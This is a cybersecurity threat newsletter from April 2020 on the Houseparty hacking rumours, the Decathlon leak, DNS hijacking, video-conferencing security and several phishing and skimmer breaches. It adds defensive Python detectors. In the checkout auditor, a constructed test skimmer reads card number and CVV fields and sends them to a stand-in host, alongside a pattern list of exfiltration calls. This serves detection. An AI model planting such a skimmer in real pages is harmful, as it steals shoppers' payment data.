Avantia Threat Update

ONLINE APP OFFERS $1 MILLION REWARD

Updated: Apr 14, 2020



This Past Week: The 'Houseparty' app offers a reward for proof of a smear campaign; Sports giant leaks 123 million records; Recent cyber attacks attributed to Turkey; ACSC - Video conferencing how-to;

Phishing attacks reel in a bountiful catch in the healthcare sector; How social distancing makes companies vulnerable to a data breach; Cybersecurity tips for working from home and major data leaks in AUSTRALIA; UNITED KINGDOM; CANADA; UNITED STATES & EUROPEAN UNION.


Dark Web ID Trends:

Top Source Hits: ID Theft Forums

Top Compromise Type: Domain

Top Industry: Media & Entertainment

Top Employee Count: 251-500


________________________________________________________________________


HOUSEPARTY APP, FACING A WAVE OF DELETIONS, SAYS IT WILL PAY $1 MILLION FOR PROOF OF HACKING SMEAR.

It was set to be the platform for these isolated times. Downloads of group-video app Houseparty surged in recent weeks as friends and family members, in a coronavirus-lockdown world, sought to move their IRL relationships online. But now Houseparty is facing a wave of deletions following rumors that the platform is compromising users' data security. Here's what you need to know.

In the past day, Twitter has been full of users claiming their Spotify, PayPal and iCloud accounts have been compromised and blaming Houseparty for the breach, without providing proof. Epic Games, which owns the app, said the claims were inaccurate. "We've found no evidence to suggest a link between Houseparty and the compromises of other unrelated accounts," a spokesperson told the BBC. In any case, "how to delete Houseparty account" became the number one worldwide trending search term on Google in the 24 hours to Wednesday morning after posts urging users to ditch the app spread quickly.

The app's developers are now offering a $1 million reward for proof of what they suspect was a "paid commercial smear campaign". Houseparty's statement reads: "We are investigating indications that the recent hacking rumors were spread by a paid commercial smear campaign to harm Houseparty. We are offering a $1,000,000 bounty for the first individual to provide proof of such a campaign to bounty@houseparty.com." It is not clear what the indications it is investigating are. Houseparty said earlier this week that "all Houseparty accounts are safe". "The service is secure, has never been compromised, and doesn't collect passwords for other sites," it said.

Paul Haskell-Dowland, the associate dean for computing and security in the School of Science at Edith Cowan University, said users should not be concerned that the app had compromised their data security. "The likelihood is this is not a breach of any kind of the Houseparty app," he told the ABC. "If indeed there were, with an organisation behind it like Epic Games, it's very likely that that would have been addressed very quickly and they would be taking preventative measures and indeed reaching out to people to inform them." He also said that it was very unlikely a company with a reputation like Epic's would intentionally introduce a backdoor into its platform that would allow it to compromise other services on a user's device.

Lukas Stefanko, from cybersecurity firm ESET, told Forbes the app "doesn't provide a lot of in-app options and settings, which creates fewer scenarios for exploiting security issues". Associate Professor Haskell-Dowland said it was either going to be an example of a commercial smear, as Houseparty alleged, or a case where a handful of users had been compromised, possibly because of what is known as a credential stuffing attack. That is where users' log-in details have ended up in a leaked database following a prior breach, like the one that hit Canva last year. Criminals then simply use bots to try those same email-and-password pairs on other services, like Houseparty, working on the assumption that many people re-use passwords across platforms. Such an attack succeeds against the user's password hygiene, not against the app, so the "breach" can look like it came from whichever service the victim happened to try last.

Deleting your account will not help you if someone has actually gained access to accounts other than your Houseparty one. Still, Associate Professor Haskell-Dowland said uninstalling the app was the obvious solution if people were concerned about an app's security.

To do that: On an iPhone, users can delete their account by going into settings and privacy and clicking "delete account"

On Android, users should email support@houseparty.com and ask for their account to be deleted and any data to be removed

As a standard protective measure, you should never use the same password for all your platforms, particularly if you are still using something like "password1" or "12345". Instead, use a password manager, which generates strong, unique log-ins for all your platforms, and turn on two-factor authentication where it is offered. "I am using 1Password and I have got over 350 unique passwords stored within that system," Associate Professor Haskell-Dowland said. "Should a particular set of credentials get lost or stolen, then it is only going to affect that one service."
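The credential stuffing described above looks different from a brute-force attack in a service's own login logs, and that difference is what a defender can key on. The following is an added example written for this update, not code from Houseparty, Epic Games or the ABC article: a small detector over a constructed authentication log. It flags a source that, within a short window, tries many different accounts with mostly failures, and lists the accounts where a stuffed password actually worked, since those are the ones to lock and reset. The log format, IP addresses and usernames are all assumed for the example.

```python
"""Credential-stuffing detection over authentication logs (added example).

Assumed log format, constructed for this example (one event per line):
    <ISO-8601 timestamp> <source IP> <username> <OK|FAIL>
A brute-force attack hammers one account from one source; credential
stuffing tries many different accounts from one source, usually once each,
with a low success rate. The detector keys on that shape.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: one stuffing source, one legitimate user who mistyped,
# one single-account brute force (should NOT be flagged as stuffing).
SAMPLE_LOG = """\
2020-04-01T10:00:01 203.0.113.7 alice FAIL
2020-04-01T10:00:02 203.0.113.7 bob FAIL
2020-04-01T10:00:03 203.0.113.7 carol FAIL
2020-04-01T10:00:04 203.0.113.7 dave FAIL
2020-04-01T10:00:05 203.0.113.7 erin OK
2020-04-01T10:00:06 203.0.113.7 frank FAIL
2020-04-01T10:00:07 203.0.113.7 grace FAIL
2020-04-01T10:00:08 203.0.113.7 heidi FAIL
2020-04-01T10:01:00 198.51.100.4 bob FAIL
2020-04-01T10:01:20 198.51.100.4 bob FAIL
2020-04-01T10:01:40 198.51.100.4 bob OK
2020-04-01T10:02:00 192.0.2.9 admin FAIL
2020-04-01T10:02:05 192.0.2.9 admin FAIL
2020-04-01T10:02:10 192.0.2.9 admin FAIL
2020-04-01T10:02:15 192.0.2.9 admin FAIL
2020-04-01T10:02:20 192.0.2.9 admin FAIL
2020-04-01T10:02:25 192.0.2.9 admin FAIL
""".splitlines()


def parse_line(line):
    """Return (timestamp, source_ip, username, succeeded)."""
    ts, ip, user, result = line.split()
    return datetime.fromisoformat(ts), ip, user, result == "OK"


def detect_credential_stuffing(lines, window=timedelta(minutes=10),
                               min_attempts=5, min_distinct_users=5,
                               max_success_rate=0.2):
    """Return {source_ip: details} for sources whose login pattern looks like
    credential stuffing: within `window`, at least `min_attempts` attempts
    spread over at least `min_distinct_users` accounts, mostly failing."""
    by_ip = defaultdict(list)
    for line in lines:
        if line.strip():
            event = parse_line(line)
            by_ip[event[1]].append(event)

    alerts = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[0])
        start = 0
        for end in range(len(events)):
            # Slide `start` forward until events[start:end+1] fits in the window.
            while events[end][0] - events[start][0] > window:
                start += 1
            span = events[start:end + 1]
            users = {e[2] for e in span}
            successes = [e[2] for e in span if e[3]]
            if (len(span) >= min_attempts
                    and len(users) >= min_distinct_users
                    and len(successes) / len(span) <= max_success_rate):
                best = alerts.get(ip)
                if best is None or len(span) > best["attempts"]:
                    alerts[ip] = {
                        "attempts": len(span),
                        "distinct_users": len(users),
                        # Accounts that accepted a stuffed password: treat as
                        # compromised (revoke sessions, force a password reset).
                        "compromised": sorted(set(successes)),
                    }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_credential_stuffing(SAMPLE_LOG).items():
        print(ip, info)
```

Against the constructed log only 203.0.113.7 is reported: eight accounts in seven seconds with one success (erin). The repeated failures from 192.0.2.9 against a single account are a brute-force pattern and are left for a separate lockout rule, and the thresholds are starting points to tune against real traffic volumes.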


SPORTS GIANT DECATHLON LEAKS 123 MILLION RECORDS

French sporting retail giant Decathlon has become the latest big brand to expose user data via a misconfigured database, leaking over 123 million records including customer and employee information, according to researchers. A team at vpnMentor uncovered the 9GB database on an Elasticsearch server that was reachable from the internet without authentication. It contained information from Decathlon's Spanish, and potentially also its UK, businesses. "The leaked Decathlon Spain database contains a veritable treasure trove of employee data and more. It has everything that a malicious hacker would, in theory, need to use to take over accounts and gain access to private and even proprietary information," said vpnMentor. Leaked data included employee usernames, unencrypted passwords and personally identifiable information (PII) including social security numbers, full names, home addresses, mobile phone numbers and birth dates. The leaked data also featured customer email and log-in information, all unencrypted. The vpnMentor team claimed that cyber-criminals could use administrator log-ins to conduct corporate espionage, bombard customers and employees with convincing phishing emails, and use the PII to engage in identity fraud. It even argued that some employees could be in physical danger. "Employees' positions and work locations are spread throughout this database, as well as their own physical home addresses," the report noted. "This could lead to disgruntled former co-workers or irate customers tracking them down and threatening their physical safety and well-being." Decathlon is claiming that, despite the large number of records contained in the database, only a small percentage relates to actual users. The unsecured database was discovered on February 12, with the company notified four days later. It took action almost immediately, closing down public access to the database on February 17. Decathlon joins a long line of organizations whose cloud security configurations have been found wanting.
Already in 2020, vpnMentor has uncovered a leak of 30,000 records linked to US cannabis users, and thousands of UK business professionals who were exposed via a London-based consultancy.


HACKERS ACTING IN TURKEY'S INTERESTS BELIEVED TO BE BEHIND RECENT CYBER ATTACKS

Sweeping cyberattacks targeting governments and other organizations in Europe and the Middle East are believed to be the work of hackers acting in the interests of the Turkish government, three senior Western security officials said. The hackers have attacked at least 30 organizations, including government ministries, embassies and security services as well as companies and other groups, according to a Reuters review of public internet records. Victims have included Cypriot and Greek government email services and the Iraqi government's national security advisor, the records show.

The attacks involve intercepting internet traffic to victim websites, potentially enabling hackers to obtain illicit access to the networks of government bodies and other organizations. According to two British officials and one U.S. official, the activity bears the hallmarks of a state-backed cyber espionage operation conducted to advance Turkish interests. The officials said that conclusion was based on three elements: the identities and locations of the victims, which included governments of countries that are geopolitically significant to Turkey; similarities to previous attacks that they say used infrastructure registered from Turkey; and information contained in confidential intelligence assessments that they declined to detail. The officials said it wasn't clear which specific individuals or organizations were responsible but that they believed the waves of attacks were linked because they all used the same servers or other infrastructure.

Turkey's Interior Ministry declined to comment. A senior Turkish official did not respond directly to questions about the campaign but said Turkey was itself frequently a victim of cyberattacks. The Cypriot government said in a statement that the "relevant agencies were immediately aware of the attacks and moved to contain" them. "We will not comment on specifics for reasons of national security," it added. Officials in Athens said they had no evidence the Greek government email system was compromised. The Iraqi government did not respond to requests for comment.

The Cypriot, Greek and Iraqi attacks identified by Reuters all occurred in late 2018 or early 2019, according to the public internet records. The broader series of attacks is ongoing, according to the officials as well as private cybersecurity investigators. A spokeswoman for the UK's National Cyber Security Centre, which is part of the GCHQ signals intelligence agency, declined to comment on who was behind the attacks. In the United States, the Office of the Director of National Intelligence declined to comment on who was behind the attacks and the Federal Bureau of Investigation did not respond to a request for comment.

The attacks highlight a weakness in a core pillar of online infrastructure that can leave victims exposed to attacks that happen outside their own networks, making them difficult to detect and defend against, cybersecurity specialists said. The hackers used a technique known as DNS hijacking, according to the Western officials and private cybersecurity experts. This involves tampering with the effective address book of the internet, the Domain Name System (DNS), which enables computers to match website addresses with the correct server. By reconfiguring parts of this system, hackers were able to redirect visitors to imposter websites, such as a fake email service, and capture passwords and other text entered there.

Reuters reviewed public DNS records, which showed when website traffic was redirected to servers identified by private cybersecurity firms as being controlled by the hackers. All of the victims identified by Reuters had traffic to their websites hijacked, often traffic visiting login portals for email services, cloud storage servers and online networks, according to the records and cybersecurity experts who have studied the attacks. The attacks have been occurring since at least early 2018, the records show.

While small-scale DNS attacks are relatively common, the scale of these attacks has alarmed Western intelligence agencies, said the three officials and two other U.S. intelligence officials. The officials said they believed the attacks were unrelated to a campaign using a similar attack method uncovered in late 2018. As part of these attacks, hackers successfully breached some organizations that control top-level domains, which are the suffixes that appear at the end of web addresses immediately after the dot symbol, said James Shank, a researcher at U.S. cybersecurity firm Team Cymru, which notified some of the victims. Victims also included Albanian state intelligence, according to the public internet records. Albanian state intelligence had hundreds of usernames and passwords compromised as a result of the attacks, according to one of the private cybersecurity investigators, who was familiar with the intercepted web traffic. The Albanian State Information Service said the attacks were on non-classified infrastructure, which does not store or process "any information classified as 'state secret' of any level."

Civilian organizations in Turkey have also been attacked, the records show, including a Turkish chapter of the Freemasons, which conservative Turkish media has said is linked to U.S.-based Muslim cleric Fethullah Gulen, accused by Ankara of masterminding a failed coup attempt in 2016. The Great Liberal Lodge of Turkey said there were no records of cyberattacks against the hijacked domains identified by Reuters and that there had been "no data exfiltration." "Thanks to precautions, attacks against the sites are not possible," a spokesman said, adding that the cleric has no affiliation with the organization. The cleric has publicly denied masterminding the attempted coup, saying "it's not possible," and has said he is always against coups. A spokesman for Gulen said Gulen was not involved in the coup attempt and has repeatedly condemned it and its perpetrators. Gulen has never been associated with the Freemason organization, the spokesman added.
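The practical lesson of the DNS hijacking described above is that a victim can do everything right inside its own network and still have its login portal redirected, because the change happens at the authoritative nameserver, the registrar or the registry. The cheapest detection is a baseline: record what the NS and A answers for your critical hostnames should be, re-resolve them on a schedule from outside your own network, and alert on any drift. The following is an added example written for this update, not code from Reuters, Team Cymru or any organisation named in the article; the hostnames, nameservers and addresses are constructed.

```python
"""Baseline monitoring for DNS hijacking (added example).

Constructed baseline and observation: in the observation, mail.* now points
at an address outside its expected netblock while its NS set is intact (a
zone-level change), and vpn.* has an unknown nameserver delegated alongside
the real ones (a registrar- or registry-level change).
"""
import ipaddress
import socket


def _norm(name):
    """Compare nameserver names case-insensitively and without a trailing dot."""
    return name.rstrip(".").lower()


# What the records are supposed to be (constructed values).
BASELINE = {
    "mail.example.gov": {
        "ns": {"ns1.example.gov", "ns2.example.gov"},
        "a_networks": ["192.0.2.0/24"],
    },
    "vpn.example.gov": {
        "ns": {"ns1.example.gov", "ns2.example.gov"},
        "a_networks": ["192.0.2.0/24", "198.51.100.0/24"],
    },
}

# What a scheduled resolution returned (constructed values).
OBSERVED = {
    "mail.example.gov": {"ns": {"NS1.example.gov.", "ns2.example.gov."},
                         "a": {"203.0.113.45"}},
    "vpn.example.gov": {"ns": {"ns1.example.gov.", "ns.hijacker-dns.example."},
                        "a": {"198.51.100.20"}},
}


def check_records(baseline, observed):
    """Return a list of (name, finding, detail) for every deviation from baseline."""
    alerts = []
    for name, expect in baseline.items():
        seen = observed.get(name)
        if not seen:
            # No answer at all is also worth a page: it can mean the zone was moved.
            alerts.append((name, "NO_ANSWER", ""))
            continue
        expected_ns = {_norm(n) for n in expect["ns"]}
        rogue_ns = {_norm(n) for n in seen.get("ns", ())} - expected_ns
        if rogue_ns:
            alerts.append((name, "NS_CHANGED", ",".join(sorted(rogue_ns))))
        nets = [ipaddress.ip_network(n) for n in expect["a_networks"]]
        for addr in sorted(seen.get("a", ())):
            if not any(ipaddress.ip_address(addr) in net for net in nets):
                alerts.append((name, "A_OUTSIDE_EXPECTED_RANGE", addr))
    return alerts


def resolve_a(name):
    """Live A-record lookup through the system resolver, for the scheduled run.
    NS records need `dig NS <name>` or a DNS library; the stdlib cannot query them."""
    try:
        return {ai[4][0] for ai in socket.getaddrinfo(name, None, socket.AF_INET)}
    except socket.gaierror:
        return set()


if __name__ == "__main__":
    for alert in check_records(BASELINE, OBSERVED):
        print(*alert)
```

Run the check from a vantage point outside the organisation and query the authoritative servers directly where possible: a resolver inside the network may keep serving the legitimate cached answer for hours after the public records have been changed. Pair it with registrar-account hardening (multi-factor authentication and registry lock, where the registrar offers it), since the baseline only tells you after the fact.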

ACSC THREAT UPDATE: VIDEO CONFERENCING - HOW TO DO IT RIGHT.

In light of the COVID-19 pandemic many businesses and individuals are now turning to web conferencing systems like Zoom, Skype, Google Hangouts, GoToMeeting and Cisco WebEx to connect online. Web conferencing solutions (also commonly referred to as online collaboration tools) often provide audio/video conferencing, real-time chat, desktop sharing and file transfer capabilities. As we increasingly use web conferencing to keep in touch while working from home, it is important to ensure that this is done securely without introducing unnecessary privacy, security and legal risks. This document provides guidance on both how to select a web conferencing solution and how to use it securely.

Selecting a web conferencing solution

When selecting a web conferencing solution, it is important that organisations ask themselves the following questions.

Is the service provider based in Australia? The use of offshore web conferencing solutions introduces additional business and security risks. For example, laws in other countries may change without notice and foreign-owned service providers that operate in Australia may still be subject to the laws of a foreign country. In addition, service providers who are located offshore may be subject to lawful and covert data collection requests and access an organisation’s data without their knowledge.

What is the service provider's track record? A service provider's actions in response to privacy issues and cyber security incidents are important, as is how quickly they disclose and take effective action to remediate security vulnerabilities in their web conferencing solution. Look for a service provider that actively and quickly engages with their customers, advocates for data privacy rights and proactively addresses cyber security issues, such as by having a vulnerability disclosure program. Conducting research on a service provider's historical responses will help identify how seriously they treat these issues.

Are privacy, security and legal requirements being met? Prior to agreeing to a service provider’s terms and conditions, organisations should seek privacy, security and legal advice. Notably, the terms and conditions should include specific clauses that address organisations’ legal, privacy and security requirements. Without privacy and security requirements being specified, organisations may not be able to verify a service provider’s security claims or whether their information is being appropriately used or not. In particular, attention should be paid to whether a service provider claims ownership of any recorded conversations and content, metadata, or files that are created or shared when using their web conferencing solution. Finally, when seeking legal advice, organisations are less likely to inadvertently accept terms and conditions that breach financial or liability rules.

What information and metadata does the service provider collect? Information and metadata can, and often will be, collected by a service provider. Such information can include (but is not limited to) names, roles, organisations, email addresses, and usernames and passwords of registered users, as well as information about devices they use. As this information may be sensitive, organisations may need to provide advice to staff as to the appropriate level of information they should disclose during the registration process. Knowing how this information will be used by a service provider will help inform organisations of the privacy, security and legal risks when using their web conferencing solution.

Does the service provider use strong encryption? A service provider should be encrypting data both while it is at rest (being stored by the service provider) and while it is in transit (being transferred between different devices). This is to ensure that the data can't be read by others who don't have a need to know. One thing to specifically look for is whether a web conferencing solution uses strong encryption, such as Transport Layer Security (TLS), to protect data while it is in transit. Web conferencing solutions that exclusively support TLS versions 1.2 and 1.3 inherently offer more protection for data transmitted across untrusted networks such as the internet.

What is the reliability and scalability of the service provider’s web conferencing solution? As the number of organisations and staff using a web conferencing solution increases, it can become overloaded. As such, it is important to ensure that any web conferencing solution will be both reliable and available in times of increased demand. Understanding the capabilities of a web conferencing solution, such as the number of simultaneous connections that can be supported, will ensure organisations and their staff are able to collaborate even during times of increased demand. If an existing web conferencing solution does not meet business requirements in times of increased demand, organisations should consider increasing the capacity of the existing solution, or using alternative methods of relaying information, prior to looking for alternative solutions that may introduce additional privacy, security and legal risks.
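The "exclusively supports TLS 1.2 and 1.3" criterion in the encryption question above is one a practitioner can verify rather than take from a data sheet. The following is an added example written for this update, not ACSC's code or any vendor's: it opens one connection per protocol version with that version pinned as both minimum and maximum and records which handshakes the server completes. The hostname is assumed; run it against the vendor's meeting, web and API hosts, and against the endpoints the desktop client actually talks to, which may differ from the marketing domain. One caveat TLS does not cover: it only protects the hop to the provider, who can still decrypt the call. Only end-to-end encryption keeps meeting content from the provider itself.

```python
"""Check which TLS versions an endpoint will negotiate (added example).

The probe tests version negotiation only. Certificate validation is switched
off here on purpose and must be checked separately.
"""
import socket
import ssl

VERSIONS = {
    "TLSv1": ssl.TLSVersion.TLSv1,
    "TLSv1.1": ssl.TLSVersion.TLSv1_1,
    "TLSv1.2": ssl.TLSVersion.TLSv1_2,
    "TLSv1.3": ssl.TLSVersion.TLSv1_3,
}
LEGACY = ("TLSv1", "TLSv1.1")
MODERN = ("TLSv1.2", "TLSv1.3")


def make_context(label):
    """Client context that will negotiate exactly one TLS version."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode
    ctx.verify_mode = ssl.CERT_NONE     # version probe only, see docstring
    ctx.minimum_version = VERSIONS[label]
    ctx.maximum_version = VERSIONS[label]
    return ctx


def probe_tls_versions(host, port=443, timeout=5):
    """Return {label: True if the server completed a handshake at that version}."""
    results = {}
    for label in VERSIONS:
        try:
            ctx = make_context(label)
            with socket.create_connection((host, port), timeout=timeout) as sock:
                with ctx.wrap_socket(sock, server_hostname=host) as tls:
                    results[label] = tls.version() == label
        except (ssl.SSLError, OSError, ValueError):
            # Handshake refused, connection failed, or this OpenSSL build cannot
            # even offer the legacy version: the server did not accept it.
            results[label] = False
    return results


def assess(results):
    """Turn a probe result into a verdict against the ACSC criterion."""
    legacy = [v for v in LEGACY if results.get(v)]
    modern = [v for v in MODERN if results.get(v)]
    if not modern:
        return "REJECT: no TLS 1.2 or 1.3 handshake succeeded"
    if legacy:
        return "WEAK: still accepts " + ", ".join(legacy)
    return "OK: only " + ", ".join(modern) + " accepted"


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "meet.example.test"  # assumed hostname
    found = probe_tls_versions(host)
    print(found)
    print(assess(found))
```

A server that completes a TLS 1.0 or 1.1 handshake fails the criterion even if it prefers 1.3 with modern clients, because a downgrade-capable client (or an attacker on the path who can influence negotiation) would still be able to land on the weaker version.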


Using a web conferencing solution

When using a web conferencing solution, it is important that organisations practice the following activities.

Configure the web conferencing solution securely

Review the service provider's documentation for the security features and recommended configurations related to their web conferencing solution. In doing so, note that default security settings in web conferencing solutions may need to be configured to meet organisational security needs. Furthermore, advise staff using the web conferencing solution on personal devices to ensure that they have applied all security patches for their devices and that their devices are as secure as reasonably practicable.

Establish meetings securely

When hosting a meeting, consider how invitations, website links and access credentials will be distributed to participants. If permitting guests, send meeting details and access credentials separately via email or encrypted messaging apps. Do not share website links or access credentials on publicly-accessible websites or social media. Finally, remember to update any access credentials periodically, such as once a month, or after they have been provided to any guests. This will reduce the risk of guests joining other meetings they haven't been invited to.

Be aware of unidentified participants

Only allow invited participants to join a meeting, and once all participants are present, consider locking the meeting so no one else can join. However, in some cases, it may not be possible to identify individual participants, such as when they join via a telephone call. In such cases, take note of sounds or visual notifications indicating that participants are joining the meeting, and ask any unknown participants to identify themselves. If unknown participants are unable to appropriately identify themselves, they should be disconnected by the meeting host.

Be aware of surroundings

Using a private location for meetings will help maintain confidentiality. If a private location isn't possible, using headphones can ensure that when working in a shared location only approved meeting participants will hear the full discussions. In addition, muting the microphone when not actively speaking improves the meeting experience by eliminating unwanted background noises, such as keyboard typing sounds or audio feedback loops, and prevents accidentally broadcasting private or sensitive discussions that may be happening nearby.

Finally, with high definition webcams now the norm, participants may unwittingly broadcast private or sensitive details in their background. Where video is required for a meeting, try to position cameras so they only capture participants' faces. Alternatively, consider using background blurring features if they are available, noting these may be specific to certain service providers.

Be mindful of conversations

Be aware of the potential private nature or sensitivity of workplace conversations, and limit discussions in meetings to those approved to be conducted using a web conferencing solution. It is also good practice to set expectations prior to a meeting, for example, whether the contents of the meeting will be recorded or made public. For Commonwealth entities, consider what sensitivity or classification has been authorised for discussions over any web conferencing solutions.

Only share what is required

If sharing screen content for a meeting, it is best practice to share an individual application instead of a device's entire screen. Alternatively, a web conferencing solution may be able to select only a section of a device's screen to share. However, if screen sharing is not required, either disable the functionality or limit its use to only the meeting host. For similar reasons, capabilities that record and automatically transcribe calls, subtitle videos or share files can create a risk of inadvertently sharing more content than intended.


When selecting web conferencing solutions, please see the Cyber Supply Chain Risk Management publication at https://www.cyber.gov.au/publications/cyber-supply-chain-risk-management.

______________________________________________________________________________


THREAT FOCUS: Tandem Diabetes Care - UNITED STATES

https://portswigger.net/daily-swig/healthcare-data-breach-medical-device-manufacturer-discloses-phishing-attack


Exploit: Phishing scam

Tandem Diabetes Care: Medical device manufacturer

Risk to Small Business: 2.555 = Severe

Five employees fell for a phishing scam that gave hackers access to email accounts containing customer data between January 17 and January 20, 2020. Although the company acted quickly to secure the compromised employee accounts, they were unable to recoup the stolen information. Given the sensitive nature of their industry, Tandem Diabetes Care will likely face increased regulatory scrutiny and hefty financial penalties.

Individual Risk: 2.428 = Severe

Although Tandem Diabetes Care has expressed confidence in the integrity of its data storage, hackers likely had access to names, contact information and service-related details, and even some patients' Social Security numbers were exposed in the breach. Victims should consider enrolling in credit and identity monitoring services.

Customers Impacted: 140,000

Effect On Customers: In response to this breach, Tandem Diabetes Care is updating its email security protocols to prevent a similar incident in the future. However, phishing scams account for a significant portion of all data breaches, and preparing for these attacks should be a built-in component of every organisation’s defense strategy.

Risk Levels:

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk *The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Corporate Services & ID Agent to the Rescue:  BullPhish ID simulates phishing attacks and conducts security awareness training campaigns to educate your employees, making them the best defense against cybercrime. Find out more here: https://www.avantiacybersecurity.com/overwatch or call Avantia on 07 30109711 (Office Hours).



THREAT FOCUS: University of Utah Health - UNITED STATES

https://www.securityweek.com/university-utah-health-discloses-data-breach?&web_view=true


Exploit: Phishing scam

University of Utah Health: Research and teaching hospital

Risk to Small Business: 1.889 = Severe

A phishing scam provided hackers with access to the University of Utah Health's network for more than a month, beginning on January 22, 2020. In addition, the healthcare provider discovered malware on its network that allowed hackers to access patient data. Although the University of Utah Health responded quickly, bad actors still had prolonged access to company and customer data, including HIPAA-protected healthcare records, creating financial, reputational, and regulatory consequences both now and in the future.

Individual Risk: 2.428 = Severe

The compromised accounts included patients' names, dates of birth, medical record numbers, and clinical data. This information can be used to craft authentic-looking spear phishing campaigns. Victims should carefully evaluate all digital communications, and consider enrolling in identity and credit monitoring services to ensure that this information isn't being misused in other ways.

Customers Impacted: Unknown

Effect On Customers: Like many companies responding to a data breach, the University of Utah Health is promising changes to its defensive posture to prevent a similar breach in the future. However, companies should assume that malware attacks and phishing scams are a "when", not an "if", and they should prepare their defensive posture accordingly.

Risk Levels:

1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk *The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Corporate Services & ID Agent to the Rescue: BullPhish ID simulates phishing attacks and conducts security awareness training campaigns to educate your employees, making them the best defense against cybercrime. Find out more here: https://www.avantiacybersecurity.com/overwatch or call Avantia on 07 30109711 (Office Hours) for more information.



THREAT FOCUS: Tupperware Products - UNITED STATES

https://www.zdnet.com/article/tupperware-website-hacked-and-infected-with-payment-card-skimmer/?&web_view=true


Exploit: Malware attack

Tupperware: Home products line

Risk to Small Business: 2.334 = Severe

Hackers infiltrated Tupperware's online store, injecting payment skimming malware into the checkout process. The malicious script was active for at least five days, and it effectively mimicked Tupperware's official payment form. After shoppers entered their data into the fake form, a "time out" error appeared, redirecting customers to the actual payment page and disguising the theft, which allowed it to go undetected.

Individual Risk: 2.428 = Severe

The payment skimming malware collected the customer data entered, including names, addresses, phone numbers, credit card numbers, expiration dates, and CVV codes. This data could allow hackers to commit financial theft or identity fraud. Those impacted by the breach should immediately notify their banks, as they will likely need to be issued new payment cards, and carefully monitor their accounts for misuse.

Customers Impacted: Unknown

Effect On Customers: The COVID-19 pandemic has heightened the already-important online shopping experience for many businesses, and online shopping is a singular respite in an otherwise bleak outlook for retailers. Companies can’t afford to lose customers because of a cybersecurity vulnerability. Many customers indicate that they will not return to an online store after a data breach, which means that companies looking to capitalize on their online stores need to make sure this avenue is secure.

Risk Levels: 1 – 1.5 = Extreme Risk 1.51 – 2.49 = Severe Risk 2.5 – 3 = Moderate Risk *The risk score is calculated using a formula that considers a wide range of factors related to the assessed breach.


Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID can find out how payment data is being used on the Dark Web, even in the case of a malware attack. Avantia works with our US Partners to strengthen our Clients security suite by offering industry-leading detection. Find out more here: https://www.avantiacybersecurity.com/overwatch or call 07 3010 9711 (Office Hours)
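A skimmer of the kind described in the Tupperware item works by getting one extra script onto the payment page, either an external script from a look-alike domain or an inline script appended to the page, and the "time out then redirect" trick exists so the shopper never notices. The most reliable way for a shop to catch that is to inventory the scripts on its own checkout page and compare them with a known-good baseline. The following is an added example written for this update, not Tupperware's code or the skimmer that hit it: it parses a page, lists every script, and flags external scripts whose host is not allowlisted and inline scripts whose SHA-256 is not in the baseline, with an extra flag when the body both reads card fields and sends data somewhere. The page content, domains, baseline and skimmer body are constructed for the example.

```python
"""Audit a checkout page's scripts against a known-good baseline (added example)."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Signs that an inline script reads payment fields and ships data out.
PAYMENT_FIELDS = re.compile(r"card.?number|cvv|cvc|expir", re.I)
EXFIL_CALLS = re.compile(r"XMLHttpRequest|fetch\(|sendBeacon|new Image\(|\.src\s*=", re.I)


class ScriptCollector(HTMLParser):
    """Collect every <script> as {"src": url-or-None, "body": inline text}."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._current = {"src": dict(attrs).get("src"), "body": ""}

    def handle_data(self, data):
        if self._current is not None:
            self._current["body"] += data

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.scripts.append(self._current)
            self._current = None


def sha256(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def audit_scripts(html, allowed_hosts, known_inline_hashes):
    """Return a list of (finding, detail) for scripts that are not in the baseline."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for script in collector.scripts:
        if script["src"]:
            host = (urlparse(script["src"]).hostname or "").lower()
            # A relative src (no host) is same-origin; any other host must be allowlisted.
            if host and host not in allowed_hosts:
                findings.append(("external_script_not_allowlisted", script["src"]))
            continue
        digest = sha256(script["body"])
        if digest in known_inline_hashes:
            continue
        finding = "unknown_inline_script"
        if PAYMENT_FIELDS.search(script["body"]) and EXFIL_CALLS.search(script["body"]):
            finding += ",reads_payment_fields_and_exfiltrates"
        findings.append((finding, digest[:16]))
    return findings


# Constructed baseline for the shop's own checkout page.
LEGIT_INLINE = "window.checkoutConfig = {currency: 'AUD', step: 'payment'};"
ALLOWED_HOSTS = {"cdn.example-shop.test"}
KNOWN_INLINE_HASHES = {sha256(LEGIT_INLINE)}

# Constructed page: the legitimate scripts plus two injected ones.
SKIMMER = (
    "document.getElementById('pay').addEventListener('submit', function () {\n"
    "  var d = {n: document.getElementById('cardNumber').value,\n"
    "           c: document.getElementById('cvv').value};\n"
    "  new Image().src = 'https://stats-collector.invalid/i?d=' + btoa(JSON.stringify(d));\n"
    "});"
)
SAMPLE_CHECKOUT_HTML = (
    "<html><head>"
    "<script src=\"https://cdn.example-shop.test/checkout.js\"></script>"
    "<script>" + LEGIT_INLINE + "</script>"
    "<script src=\"https://static-cdn-assets.invalid/jquery.min.js\"></script>"
    "</head><body><form id=\"pay\"><input id=\"cardNumber\"><input id=\"cvv\"></form>"
    "<script>" + SKIMMER + "</script></body></html>"
)

if __name__ == "__main__":
    for finding in audit_scripts(SAMPLE_CHECKOUT_HTML, ALLOWED_HOSTS, KNOWN_INLINE_HASHES):
        print(*finding)
```

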